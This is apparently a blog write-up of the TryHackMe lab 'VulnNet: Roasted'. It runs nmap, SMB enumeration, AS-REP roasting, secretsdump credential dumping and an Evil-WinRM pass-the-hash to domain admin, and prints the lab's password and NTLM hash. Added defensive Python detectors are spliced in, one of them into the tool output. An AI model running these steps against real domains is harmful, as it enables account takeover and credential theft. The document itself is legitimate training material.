CREATE & DESTROY

VulnNet: Roasted | TryHackMe

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they have, as always, hired you to perform a penetration test and see how the system administrators are performing.

This is a much simpler machine, do not overthink. You can do it by following common methodologies.

Not shown: 989 filtered tcp ports (no-response)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-22 18:48:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Initial nmap results. We'll start by enumerating the SMB shares.

smbmap -H -u anonymous -p ""
[+] Guest session       IP:    Name:                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                             NO ACCESS       Remote Admin
        C$                                                 NO ACCESS       Default share
        IPC$                                               READ ONLY       Remote IPC
        NETLOGON                                           NO ACCESS       Logon server share 
        SYSVOL                                             NO ACCESS       Logon server share 
        VulnNet-Business-Anonymous                         READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                       READ ONLY       VulnNet Enterprise Sharing

We’ve got anonymous access to two shares, so we'll download all the files and explore. They contain what appear to be employee names, so we may be able to use them to password spray. After creating a list of potential logins from the names we collected, we can use kerbrute to validate them.

└─$ ./kerbrute_linux_amd64 userenum -d vulnnet-rst.local --dc ~/Desktop/thm/vuln_roasted/users

All of them failed, so no potential usernames. Back to the drawing board.

After a lot of Googling I came across an Ippsec video where he talks about exposed IPC$ shares and an impacket tool called lookupsid.py, which, using our anonymous login, can grab a list of users.

1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Continuing with the impacket theme, I’ll try GetNPUsers.py to attempt to obtain hashes for the usernames, and it looks like we’re able to grab a hash for t-skid:

└─$ ./GetNPUsers.py vulnnet-rst.local/ -dc-ip -usersfile ~/Desktop/thm/vuln_roasted/users -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
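The UF_DONT_REQUIRE_PREAUTH flag that GetNPUsers.py checks for is the control a defender should be auditing and alerting on. The following is an added example, not code from this write-up or from impacket: it decodes the userAccountControl bitmask from a constructed directory export to list enabled accounts that don't require Kerberos pre-authentication, then scans constructed Security event 4768 (TGT request) records for the trace a request without pre-authentication leaves (Pre-Authentication Type 0, success status, RC4 ticket encryption 0x17). The account names mirror the users found above; the flag values, event fields and source IP are constructed or documented constants, as commented.

```python
"""Defender-side checks for the pre-auth exposure GetNPUsers.py found.

Added example for this write-up; all records below are constructed.
"""
import re
from typing import Dict, List, Tuple

# Documented userAccountControl bits (subset).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed directory export: sAMAccountName -> userAccountControl.
# Names mirror the room's users; the flag values are illustrative.
DIRECTORY_EXPORT: Dict[str, int] = {
    "a-whitehat":   UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
    "t-skid":       UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH,
    "j-goldenhand": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
    "j-leet":       UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
    "old-svc":      UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE,
}


def accounts_without_preauth(export: Dict[str, int], include_disabled: bool = False) -> List[str]:
    """Accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set.

    Disabled accounts are skipped by default: they cannot be roasted, but
    listing them is still useful for cleanup.
    """
    hits = []
    for sam, uac in export.items():
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(sam)
    return sorted(hits)


# Constructed extract of Security event 4768 ("A Kerberos authentication
# ticket (TGT) was requested"), flattened to key=value pairs. The 4769
# service-ticket line has no pre-auth field (shown as "-") and is included
# only to show it is ignored.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=a-whitehat PreAuthType=2 TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=t-skid PreAuthType=0 TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=j-leet PreAuthType=0 TicketEncryptionType=0x17 Status=0x19 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=a-whitehat PreAuthType=- TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened event line into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def asrep_roast_candidates(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(user, source ip, severity) for successful TGT requests made without pre-auth.

    PreAuthType 0 means the KDC issued a TGT with no pre-authentication, which
    is exactly what GetNPUsers.py relies on. RC4 (0x17) ticket encryption is
    rated high because that is the cheap-to-crack form; AES responses are
    still worth a look. Status 0x19 (KDC_ERR_PREAUTH_REQUIRED) is the normal
    reply for accounts that do require pre-auth, so those lines are not findings.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":
            continue
        severity = "high" if ev.get("TicketEncryptionType") == "0x17" else "medium"
        findings.append((ev["TargetUserName"], ev["IpAddress"], severity))
    return findings


if __name__ == "__main__":
    print("accounts not requiring pre-auth:", accounts_without_preauth(DIRECTORY_EXPORT))
    for user, ip, sev in asrep_roast_candidates(SAMPLE_4768):
        print(f"[{sev}] TGT issued without pre-auth for {user} from {ip}")
```

In a real environment the export would come from an LDAP query for userAccountControl and the events from the domain controllers' Security logs; the fix for every hit in the first list is simply clearing the "Do not require Kerberos preauthentication" option on the account.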

Using t-skid we can authenticate back to SMB and find a script named ResetPassword.vbs inside. It contains the credentials for another user, and checking these with crackmapexec shows we can get shell access with Evil-WinRM.

crackmapexec smb -u a-whitehat -p bNdKVkjv3RR9ht
SMB    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)
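The ResetPassword.vbs finding is the kind of thing a share-content sweep should catch before anyone else does. The following is an added example, not from this write-up or the room: a small scanner that runs a handful of credential-assignment patterns over files copied from readable shares and reports the location with the secret redacted. File names and contents are constructed samples in the style of the finding, not the room's actual script, and the regexes are illustrative rather than exhaustive.

```python
"""Sweep files copied from readable shares for hard-coded credentials.

Added example for this write-up; file names and contents are constructed.
"""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Patterns that commonly carry a secret in admin scripts; group 1 is the
# secret. Illustrative, not exhaustive.
SECRET_PATTERNS = [
    # VBScript / PowerShell style assignment: strPassword = "..."
    re.compile(r'(?i)\b\w*pass(?:word|wd)?\w*\s*=\s*"([^"]+)"'),
    # net user <name> <password> /add or /domain
    re.compile(r'(?i)\bnet\s+user\s+\S+\s+(\S+)\s+/'),
    # ADSI SetPassword with a literal: objUser.SetPassword "..."
    re.compile(r'(?i)\.SetPassword\s*\(?\s*"([^"]+)"'),
    # key=value in config/ini files (applied per line, so ^ is line start)
    re.compile(r'(?i)^\s*(?:password|pwd|secret)\s*[:=]\s*(\S+)'),
]

# Constructed copies of share contents, in the style of the ResetPassword.vbs
# finding. Paths are made up and none of this is the room's real script.
SAMPLE_FILES: Dict[str, str] = {
    "downloaded/Business-Tracking.txt": "Quarterly targets and notes.\n",
    "downloaded/ResetPassword.vbs": (
        'strUserNTName = "svc-example"\n'
        'strPassword = "Pa55w0rd-constructed"\n'
        'Set objUser = GetObject("LDAP://cn=svc-example,dc=example,dc=local")\n'
        'objUser.SetPassword strPassword\n'
    ),
    "downloaded/onboard.bat": "net user newhire Welcome1-constructed /add /domain\n",
    "downloaded/app.ini": "[db]\npassword = db-constructed\n",
}


def redact(secret: str) -> str:
    """Keep only the first character and length so the report does not re-leak the value."""
    return secret[0] + "*" * (len(secret) - 1)


def scan_for_secrets(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, redacted_secret) for each suspected credential.

    One finding per line is enough for triage, so the first matching pattern wins.
    """
    findings = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), start=1):
            for pat in SECRET_PATTERNS:
                m = pat.search(line)
                if m:
                    findings.append((path, lineno, redact(m.group(1))))
                    break
    return findings


def load_tree(root: str) -> Dict[str, str]:
    """Read every regular file under a directory of downloaded share contents.

    Binary or oddly encoded files are read with replacement characters rather
    than aborting the sweep.
    """
    base = Path(root)
    return {
        str(p.relative_to(base)): p.read_text(errors="replace")
        for p in sorted(base.rglob("*"))
        if p.is_file()
    }


if __name__ == "__main__":
    for path, lineno, hint in scan_for_secrets(SAMPLE_FILES):
        print(f"{path}:{lineno}: possible hard-coded credential ({hint})")
```

Point `load_tree` at the folder smbmap or a recursive copy produced and feed the result to `scan_for_secrets`; the report tells you which script to rotate and remove from the share without writing the password itself into a ticket.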

We discover that a-whitehat is a domain admin, so since we’re on an impacket roll, let’s see what we can get from secretsdump…

/secretsdump.py VULNNET-RST.LOCAL/a-whitehat:bNdKVkjv3RR9ht@ 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)

We successfully dump the NTLM hash for the Administrator account, so we can use Evil-WinRM to pass the hash…

└─$ evil-winrm -i -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

This was a fun room in Active Directory basics and a nice tour through the amazing tools in the impacket suite.
